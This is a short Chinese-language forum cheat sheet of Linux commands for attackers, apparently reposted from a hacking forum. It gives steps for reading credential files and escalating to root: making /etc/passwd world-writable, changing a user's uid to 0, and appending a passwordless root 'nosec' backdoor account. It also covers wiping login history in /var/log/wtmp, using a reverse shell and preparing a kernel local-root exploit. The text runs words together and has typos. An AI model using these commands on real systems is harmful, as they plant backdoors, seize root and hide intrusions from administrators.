cat/etc/passwd查看linux用户
cat/etc/shadow查看用户密码需要root权限
cat/etc/sysconfig/network-scripts/ifcfg-ethnN代表网卡号查看所在网卡的ip信息
ifconfig查看本机ip信息
cat/etc/resolv.conf查看DNS信息
bash-i在反弹的shell中使用可以直观显示命令
bashprompt:当你以普通限权用户身份进入的时候,一般你会有一个类似bash$的prompt。当你以
Root登陆时,你的prompt会变成
bash#。
系统变量:试着echo"$USER/$EUID"系统应该会告诉你它认为你是什么用户。
echo1>/proc/sys/net/ipv4/if_forward是不是你写错了,应该是echo1>/proc/sys/net/ipv4/ip_forward,
vim/proc/sys/net/ipv4/ip_forward吧,默认是0,也就是内核不进行数据*滤,改为1,让内核对数据包进行filter处理!
netstat-an|grepLISTEN|grep:80查看端口
service--status-all|greprunning
service--status-all|grephttp
查看运行服务
lsb_release-a查看系统版本
重启ssh服务:/usr/sbin/sshdstop
/
usr/sbin/sshdstart
ssd_config文件里
PasswordAuthenticationno,
将其改为
PasswordAuthenticationyes
远程ssh才可登录
否则显示Accessdenied
其中Usepamyes可能用来建立pam方式login,比如从其它linux主机ssh到服务端,如果关闭,则不能打开.
su的菜鸟用法
先chomod777/etc/passwd
然后修改bin用户的gid和uid为0
然后passwd设置bin的密码
然后cp/bin/bash/sbin/nologin
然后su的时候su-bin就可以到rootshell了。
这个原理就是当ssh不允许root用ssh终端登陆的时候,我们又不知道root密码,的一种很菜鸟的做法
还可以这样
sed-is/bin:x:1:1/bin:x:0:1/g/etc/passwd
g*rtcl2.c–olocal–static–Wall
echo"nosec:x:0:0::/:/bin/sh">>/etc/passwd
echo"nosec::-1:-1:-1:-1:-1:-1:500">>/etc/shadow
清空last记录cp/dev/null/var/log/wtmp
-----
ddif=/dev/zeroof=yourfilebs=10Mcount=10建立一个100m的大文件在利用LinuxKernel<=2.6.17.4(proc)LocalRootExploit提权的时候要用到的
转载请注明出自暗组信息安全论坛http://forum.darkst.com/,本贴地址:http://forum.darkst.com/viewthread.php?tid=45960
*
* |